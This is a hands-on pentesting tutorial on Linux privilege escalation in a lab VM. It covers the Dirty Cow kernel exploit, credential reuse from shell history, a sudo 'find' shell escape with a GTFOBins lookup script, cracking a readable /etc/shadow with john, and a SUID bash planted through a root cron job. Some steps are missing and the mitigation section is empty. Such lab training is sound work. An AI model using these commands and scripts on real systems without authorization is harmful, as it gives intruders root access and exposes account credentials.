A Hands-On Approach To Linux Privilege Escalation
Tanishq Sharma, Shikhar Saxena
INTRODUCTION
This document is intended to provide multiple techniques that pentesters can use
to escalate their privileges and gain access to higher roles (for example, administrator
or root) once they already hold a low-privileged shell on the target.
Lucideus 2020 2
Linux Privilege Escalation
Linux privilege escalation can be done in many ways; the types this document covers are:
● Kernel exploits (Dirty Cow)
● Credentials left behind in shell history
● Misconfigured sudo rights
● Weak file permissions on /etc/shadow
● A root-owned scheduled (cron) job that executes a writable script
Lab setup (the vulnerable VM comes from the git repo listed in the references):
2. In the git repo there are credentials provided for the machine.
3. Log in to the machine and check its IP address with the ifconfig command; in our
case it is 192.168.110.129.
Kernel Exploit (Dirty Cow)
1. Start by opening an SSH session to the victim machine with the command ssh
user@192.168.110.129 (username: user, password: password321).
2. Once on the victim machine, do some system enumeration to learn about the target by
running commands such as "uname -a" and "cat /proc/version".
3. With the kernel version in hand, look for an exploit matching it. In this case the kernel
was vulnerable to the Dirty Cow exploit (CVE-2016-5195).
A. The exploit can be found at: https://www.exploit-db.com/exploits/40839
B. Copy the exploit source code.
4. Create a file with "nano dirty.c" and paste the exploit code into it.
5. Compile the exploit with:
● gcc -pthread dirty.c -o dirty -lcrypt
6. After compiling, run the resulting binary, in this case "./dirty".
7. While running, the exploit asks for a password; enter any password you can remember.
The exploit writes a new root-equivalent user named firefart into /etc/passwd with that password.
● su firefart (when prompted, enter the password you chose while the exploit was running).
Now we know the exploit actually worked, as we have a root shell.
Note that the exploit overwrites /etc/passwd in place and keeps a backup at /tmp/passwd.bak; when you are done, restore it with "mv /tmp/passwd.bak /etc/passwd" (the exploit itself prints this reminder), otherwise the firefart account stays on the box.
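Before compiling anything, it is worth checking whether the kernel release even predates the fix. The following is an added example (it is not from the Lucideus document or from the exploit author): a small POSIX shell check that compares the output of "uname -r" against the upstream releases that shipped the Dirty Cow fix (4.8.3, backported to 4.7.9 and 4.4.26). Distribution kernels carry backports under unchanged version numbers, so a hit only means "worth testing", never "confirmed vulnerable"; the version thresholds are the only facts assumed here.

```shell
#!/bin/sh
# Added example, not code from the Lucideus document or the exploit author.
# Decide whether a kernel release string (as printed by "uname -r") predates
# the upstream Dirty COW (CVE-2016-5195) fix. The fix shipped in 4.8.3 and was
# backported to the 4.7.9 and 4.4.26 stable releases. Distribution kernels
# carry their own backports under unchanged version numbers, so a hit here
# means "worth testing", never "confirmed vulnerable".

# ver_lt A B -> exit 0 when dotted version A is numerically lower than B
# (compares the first three components; missing components count as 0)
ver_lt() {
    awk -v a="$1" -v b="$2" 'BEGIN {
        n = split(a, x, "."); m = split(b, y, ".")
        for (i = 1; i <= 3; i++) {
            xi = (i <= n) ? x[i] + 0 : 0
            yi = (i <= m) ? y[i] + 0 : 0
            if (xi < yi) exit 0
            if (xi > yi) exit 1
        }
        exit 1
    }'
}

# kernel_maybe_dirtycow RELEASE -> exit 0 when RELEASE is older than the first
# release of its own stable series that carries the fix
kernel_maybe_dirtycow() {
    rel=${1%%-*}                      # "4.4.0-31-generic" -> "4.4.0"
    rel=${rel%%+*}                    # drop a "+" build suffix if present
    maj=${rel%%.*}
    rest=${rel#*.}
    min=${rest%%.*}
    case "$maj.$min" in
        4.8) ver_lt "$rel" 4.8.3 ;;
        4.7) ver_lt "$rel" 4.7.9 ;;
        4.4) ver_lt "$rel" 4.4.26 ;;
        # any other series older than 4.8.3 (3.x, 4.0-4.6) only got the fix
        # through distribution or long-term-stable backports: flag it for review
        *)   ver_lt "$rel" 4.8.3 ;;
    esac
}

# Same check against the running kernel; pair it with "cat /proc/version" and
# the distribution's changelog before building the exploit.
if kernel_maybe_dirtycow "$(uname -r)"; then
    echo "$(uname -r): predates the upstream fix, test for CVE-2016-5195"
else
    echo "$(uname -r): newer than the upstream fix"
fi
```

Run it on the target with sh; an "older" verdict on a vendor kernel (Ubuntu 4.4.0-NN, RHEL 3.10.0-NNN) still needs the vendor changelog or a harmless test run of the exploit against a throwaway file before you trust it.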
Stored Passwords in Shell History
1. Start by opening an SSH session to the victim machine with the command ssh
user@192.168.110.129 (username: user, password: password321).
2. Look at the commands that were previously run on the target machine with the
"history" command or "cat ~/.bash_history".
3. In the output we can see the credentials used for MySQL; since passwords are often
reused, try the same credentials against the root account (for example with "su root").
The credentials found in the history also worked for the root user.
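History files rarely contain the word "password" on its own; secrets hide in inline options like "-pSECRET" or in exported variables. The following added example (not from the Lucideus document) generalises the "history" step above into a small scanner over several history files and patterns, plus a helper that pulls the value glued to a MySQL-style "-p" option. The sample history it scans is constructed for the demo and is not a capture from the lab machine.

```shell
#!/bin/sh
# Added example, not code from the Lucideus document. Scans shell/client
# history files for lines that look like they carry credentials, generalising
# the "history | grep" step above to several files and several patterns.

# cred_lines FILE... -> prints "file:lineno:line" for suspicious lines.
# Patterns: an inline "-pSECRET" argument (mysql, mysqladmin and friends;
# "ssh -p2222" is an accepted false positive), "password=" / "passwd:" style
# assignments, sshpass, and token/secret/api-key words. Unreadable files are skipped.
cred_lines() {
    for f in "$@"; do
        [ -r "$f" ] || continue
        grep -n -i -E \
            -e '(^|[[:space:]])-p[^[:space:]]+' \
            -e 'pass(word|wd)?[=: ]' \
            -e 'sshpass' \
            -e 'token|secret|api[_-]?key' \
            "$f" | sed "s|^|$f:|"
    done
    return 0
}

# mysql_inline_password LINE -> prints the value glued to a "-p" option, or
# nothing when the line has no inline password
mysql_inline_password() {
    printf '%s\n' "$1" | sed -n 's/.*[[:space:]]-p\([^[:space:]]\{1,\}\).*/\1/p'
}

# history_files -> the history files worth checking on a real target
# (only those that exist are printed)
history_files() {
    for f in "$HOME/.bash_history" "$HOME/.zsh_history" "$HOME/.mysql_history" \
             "$HOME/.psql_history" "$HOME/.python_history" "$HOME/.sh_history"; do
        [ -f "$f" ] && printf '%s\n' "$f"
    done
    return 0
}

# Constructed sample history (not a real capture) so the scan runs offline
SAMPLE_HISTORY=$(mktemp)
cat > "$SAMPLE_HISTORY" <<'EOF'
ls -la
cd /var/www/html
mysql -h somehost.local -uroot -ppassword123
export DB_PASSWORD=hunter2
sudo -l
EOF

echo "== suspicious history lines =="
cred_lines "$SAMPLE_HISTORY"
echo "== inline MySQL password =="
mysql_inline_password 'mysql -h somehost.local -uroot -ppassword123'
rm -f "$SAMPLE_HISTORY"
# On a target: cred_lines $(history_files)
```

Each hit is a candidate for "su root" or for the service it belongs to; the scanner flags, it does not decide, so expect a few false positives from options that merely start with -p.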
Sudo Misconfiguration
1. Start by opening an SSH session to the victim machine with the command ssh
user@192.168.110.129 (username: user, password: password321).
2. Run "sudo -l" to list the commands this user is allowed to run through sudo.
From the output, notice the list of programs that can be executed via sudo.
3. Notice that the find command can be run via sudo, so use it to elevate our privilege with the
command "sudo find . -exec /bin/sh \; -quit".
Because find was allowed via sudo, its -exec action runs /bin/sh as root; -quit stops find after
the first match so only one shell is spawned.
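Reading "sudo -l" output by eye is fine for one rule; with a longer list it helps to map every allowed binary to its known shell escape. The following added example (not from the Lucideus document) parses "sudo -l" output from stdin and prints the GTFOBins escape (reference 2) for a short built-in set of binaries, pointing at GTFOBins for anything else. The sample "sudo -l" text, its hostname and its rules are constructed for the demo.

```shell
#!/bin/sh
# Added example, not code from the Lucideus document. Reads "sudo -l" output
# on stdin, pulls out each allowed command, and prints the matching shell
# escape for a handful of binaries taken from GTFOBins (reference 2). The
# sample output below is constructed, not captured from the lab machine.

# sudo_shell_escapes < sudo-l-output -> one line per allowed command
sudo_shell_escapes() {
    # keep only rule lines such as "(ALL) NOPASSWD: /usr/bin/find",
    # drop the "(runas)" prefix and any TAG: words, then split on commas
    grep -E '^[[:space:]]*\(' |
    sed -e 's/^[[:space:]]*([^)]*)[[:space:]]*//' -e 's/[A-Z]*:[[:space:]]*//g' |
    tr ',' '\n' |
    while read -r cmd rest; do
        [ -n "$cmd" ] || continue
        bin=${cmd##*/}
        case "$bin" in
            ALL)    echo "ALL: any command allowed, e.g. sudo /bin/sh" ;;
            find)   echo "$bin: sudo $cmd . -exec /bin/sh \\; -quit" ;;
            vim|vi) echo "$bin: sudo $cmd -c ':!/bin/sh'" ;;
            less|more) echo "$bin: sudo $cmd /etc/profile   (then type !/bin/sh)" ;;
            awk|gawk|mawk|nawk) echo "$bin: sudo $cmd 'BEGIN {system(\"/bin/sh\")}'" ;;
            python|python2|python3) echo "$bin: sudo $cmd -c 'import os; os.system(\"/bin/sh\")'" ;;
            perl)   echo "$bin: sudo $cmd -e 'exec \"/bin/sh\";'" ;;
            env)    echo "$bin: sudo $cmd /bin/sh" ;;
            sh|bash|dash|zsh) echo "$bin: sudo $cmd" ;;
            *)      echo "$bin: not in this short list, look it up at https://gtfobins.github.io/#+sudo" ;;
        esac
    done
}

# Constructed sample in the format sudo prints (hostname and rules are made up)
SAMPLE_SUDO_L='Matching Defaults entries for user on debian:
    env_reset, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User user may run the following commands on debian:
    (ALL) NOPASSWD: /usr/bin/find
    (root) /usr/bin/vim, /usr/bin/less
    (ALL) /usr/bin/apt-get'

printf '%s\n' "$SAMPLE_SUDO_L" | sudo_shell_escapes
# On a real target replace the sample with: sudo -l | sudo_shell_escapes
```

Rules with arguments ("(root) /usr/bin/find /var/log") are still printed, but sudo then only matches that exact argument list, so the escape must be adjusted or will be refused; the parser keeps the binary path and leaves that judgement to you.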
Weak File Permissions (/etc/shadow)
1. Start by opening an SSH session to the victim machine with the command ssh
user@192.168.110.129 (username: user, password: password321).
2. Check the permissions on the shadow file with "ls -l /etc/shadow".
So we can see that /etc/shadow has the read permission set for everyone, so the regular user is
allowed to read this file.
3. Read it with "cat /etc/shadow" and copy the hash field (the second colon-separated field) of the root line.
4. On your attacker machine, open a terminal and put the hash in a file: echo "root_hash" >
hash.txt (pasting the whole root line, "root:$6$...:...", instead of only the hash field also works and
lets john label the cracked password with the username).
5. Crack it with john: john --wordlist=<path/to/wordlist> hash.txt
6. From the output, note the cracked password, in this case "password123", and use it
to escalate your privilege (su root).
The password recovered by cracking the hash worked for root.
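The two checks in this technique, "is the file readable by others" and "what kind of hash is in the root line", are worth scripting so they can be repeated on every box. The following added example (not from the Lucideus document) does both and builds the john command line with an explicit --format, so john does not have to guess the scheme. The shadow file it works on is constructed with a made-up hash body; the wordlist path is only a placeholder.

```shell
#!/bin/sh
# Added example, not code from the Lucideus document. Checks whether a shadow
# file is readable by "other", pulls out the root hash, and names the crypt(3)
# scheme from its $id$ prefix so john can be told the format instead of
# guessing. The sample shadow file below is constructed with a fake hash.

# others_readable FILE -> exit 0 when the "other" read bit is set
# (column 8 of "ls -l", the last "r" in "-rw-r--r--")
others_readable() {
    [ "$(ls -ld "$1" | cut -c8)" = r ]
}

# root_hash SHADOWFILE -> prints field 2 (the hash) of the root entry
root_hash() {
    awk -F: '$1 == "root" { print $2; exit }' "$1"
}

# hash_algo HASH -> scheme name from the prefix; "locked" for "!"/"*" entries
hash_algo() {
    case "$1" in
        '$1$'*)                  echo md5crypt ;;
        '$2a$'*|'$2b$'*|'$2y$'*) echo bcrypt ;;
        '$5$'*)                  echo sha256crypt ;;
        '$6$'*)                  echo sha512crypt ;;
        '$7$'*)                  echo scrypt ;;
        '$y$'*)                  echo yescrypt ;;
        '!'*|'*'|'')             echo locked ;;
        *)                       echo unknown ;;
    esac
}

# john_command SHADOWFILE WORDLIST -> the john invocation for the root hash;
# keeps "root:" in hash.txt so john reports the username with the password.
# --format is only emitted for schemes john knows under that exact name.
john_command() {
    algo=$(hash_algo "$(root_hash "$1")")
    case "$algo" in
        md5crypt|sha256crypt|sha512crypt|bcrypt)
            echo "grep '^root:' $1 > hash.txt && john --format=$algo --wordlist=$2 hash.txt" ;;
        locked)
            echo "root has no usable hash in $1; nothing to crack" ;;
        *)
            echo "grep '^root:' $1 > hash.txt && john --wordlist=$2 hash.txt" ;;
    esac
}

# Constructed shadow file: sha512crypt-style prefix with a made-up hash body
SAMPLE_SHADOW=$(mktemp)
printf 'root:$6$saltsalt$madeuphashbody:18000:0:99999:7:::\nbin:*:18000:0:99999:7:::\n' > "$SAMPLE_SHADOW"
chmod 644 "$SAMPLE_SHADOW"

if others_readable "$SAMPLE_SHADOW"; then
    echo "$SAMPLE_SHADOW is world-readable; root scheme: $(hash_algo "$(root_hash "$SAMPLE_SHADOW")")"
    john_command "$SAMPLE_SHADOW" /usr/share/wordlists/rockyou.txt
fi
rm -f "$SAMPLE_SHADOW"
# Against the real file: others_readable /etc/shadow && john_command /etc/shadow <wordlist>
```

The scheme matters for expectations as much as for john's flags: a sha512crypt hash with a weak password falls to a wordlist in seconds, while a yescrypt or bcrypt hash with the same password costs orders of magnitude more per guess.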
Cron Jobs
1. Start by opening an SSH session to the victim machine with the command ssh
user@192.168.110.129 (username: user, password: password321).
5. Wait one minute for the root cron job to execute the modified bash script, then in your shell type:
/tmp/bash -p
This only yields root if the script, when run by cron as root, copied /bin/bash to /tmp/bash and set the
SUID bit on it (cp /bin/bash /tmp/bash; chmod u+s /tmp/bash); the -p flag tells bash not to drop the
effective UID it inherited from the SUID bit, so the resulting shell runs as root.
Mitigation:
References:
1. https://www.exploit-db.com/exploits/40839
2. https://gtfobins.github.io/#+sudo
3. https://www.exploit-db.com/docs/46131
4. https://www.netsparker.com/blog/web-security/privilege-escalation/
5. https://github.com/sagishahar/lpeworkshop
6. https://drive.google.com/file/d/0B6EDpYQYL72rQ2VuWS1QR2ZsUlU/view